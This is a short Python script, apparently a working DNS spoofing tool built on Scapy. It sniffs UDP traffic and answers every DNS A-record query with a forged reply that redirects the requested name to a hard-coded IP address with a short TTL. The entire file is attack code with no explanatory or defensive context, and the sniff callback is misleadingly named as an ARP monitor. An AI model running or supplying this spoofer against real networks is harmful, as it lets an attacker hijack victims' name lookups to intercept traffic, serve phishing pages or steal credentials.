import sys
from scapy.all import *

def is_dns_request(req):
    return req.haslayer(DNS) and req.getlayer(DNS).qr == 0 \
            and req.getlayer(DNS).qd.qtype == 1

def make_reply(req):
    ip = req.getlayer(IP)
    dns = req.getlayer(DNS)
    resp = IP(dst=ip.src, src=ip.dst)/UDP(dport=ip.sport, sport=ip.dport)
    # rdata = "192.168.13.37"
    rdata = "18.250.7.183"
    resp /= DNS(id=dns.id, qr=1, qd=dns.qd, an=
                DNSRR(rrname=dns.qd.qname, type=dns.qd.qtype,
                      rclass=dns.qd.qclass, ttl=10, rdata=rdata))
    print resp.src
    print resp.dst
    print resp.summary()
    return resp

def arp_monitor_callback(pkt):
    if is_dns_request(pkt):
        print pkt.summary()
        send(make_reply(pkt))

sniff(prn=arp_monitor_callback, filter="udp", store=0)
